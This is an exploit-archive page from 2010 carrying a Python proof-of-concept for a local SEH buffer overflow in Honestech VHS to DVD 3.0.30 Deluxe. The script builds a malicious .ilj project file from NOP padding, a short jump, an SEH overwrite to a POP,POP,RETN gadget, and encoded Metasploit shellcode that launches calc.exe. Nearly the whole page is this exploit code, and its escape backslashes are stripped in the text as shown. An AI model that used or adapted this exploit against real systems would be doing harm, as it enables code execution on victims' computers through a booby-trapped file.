Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)
# Published : 2010-09-16
# Author : Brennon Thomas
# Previous Title : x86_64 Linux Kernel ia32syscall Emulation Privilege Escalation
# Next Title : MP3 Workstation Version 9.2.1.1.2 SEH exploit

#!/usr/bin/python
#
# Exploit Title: Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)
# Date: September 16, 2010
# Author: Brennon Thomas thomab310@gmail.com
# Software Link: n/a
# Version: <= 3.0.30.0 Deluxe
# Tested on: Windows XP SP2/SP3 using Honestech VHS to DVD 3.0.2 and 3.0.30.0
#
# Usage: This python script generates the malicious .ilj project file. 
# Open Honestech VHS to DVD <= 3.0.30 Deluxe in Advanced mode and
# load the corrupt file.
#
# Exploit is for education purposes only.  Author takes no responsibility
# for what you do with it. 

#Required file text
buf = "rn
rn
<CAPTURE>rn
rn
[MAINDLG]rn
PAGE=0rn
rn
[AVICODEC]rn
VIDEOCODEC=DivX 6.8.5 Codec (2 Logical CPUs)rn
AUDIOCODEC=MPEG Layer-3rn
rn
[WMVINFO]rn
TITLE=  rn
AUTHOR=  rn
COPYRIGHT=  rn
DESCRIPTION=  rn
rn
[CAPTUREINFO]rn
OUTPUTFOLDER=E:\misc\rn
STATE=0,1,1,0,4396,4,1,0,0rn
rn
[BURNINFO]rn
STATE=0,0,0,0,0,0rn
TEMPFOLDER=E:\misc\rn
VIDEOTSFOLDER=E:\misc\rn
IMAGEFOLDER=E:\misc\rn
rn
[FILELIST]rn
FILE=E:\"

buf += "x90"*257         #Junk
buf += "xebx08x90x90" #JMP SHORT 8, NOP Padding
buf += "xbax25x31x58" #SEH Overwrite to POP,POP,RETN in msg723.acm
buf += "x90"*16          #NOP Buffer

#msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b 'x00x0ax0dx2c' -t c
#[*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
buf += ("xbexf9x89xfaxaaxdbxcaxd9x74x24xf4x33xc9xb1x33"
"x5dx31x75x13x83xedxfcx03x75xf6x6bx0fx56xe0xe5"
"xf0xa7xf0x95x79x42xc1x87x1ex06x73x18x54x4ax7f"
"xd3x38x7fxf4x91x94x70xbdx1cxc3xbfx3ex91xcbx6c"
"xfcxb3xb7x6exd0x13x89xa0x25x55xcexddxc5x07x87"
"xaax77xb8xacxefx4bxb9x62x64xf3xc1x07xbbx87x7b"
"x09xecx37xf7x41x14x3cx5fx72x25x91x83x4ex6cx9e"
"x70x24x6fx76x49xc5x41xb6x06xf8x6dx3bx56x3cx49"
"xa3x2dx36xa9x5ex36x8dxd3x84xb3x10x73x4fx63xf1"
"x85x9cxf2x72x89x69x70xdcx8ex6cx55x56xaaxe5x58"
"xb9x3axbdx7ex1dx66x66x1ex04xc2xc9x1fx56xaaxb6"
"x85x1cx59xa3xbcx7ex34x32x4cx05x71x34x4ex06xd2"
"x5cx7fx8dxbdx1bx80x44xfaxd3xcaxc5xabx7bx93x9f"
"xe9xe6x24x4ax2dx1exa7x7fxcexe5xb7xf5xcbxa2x7f"
"xe5xa1xbbx15x09x15xbcx3fx6axf8x2exa3x43x9fxd6"
"x46x9cx55")

buf += "x90"*(6000-(len(buf))) #NOP Buffer
buf += ",0,7462,885953024,4,1,640,480rn" #Required file text

f = open("sploit.ilj", "w")
f.write(buf)
f.close()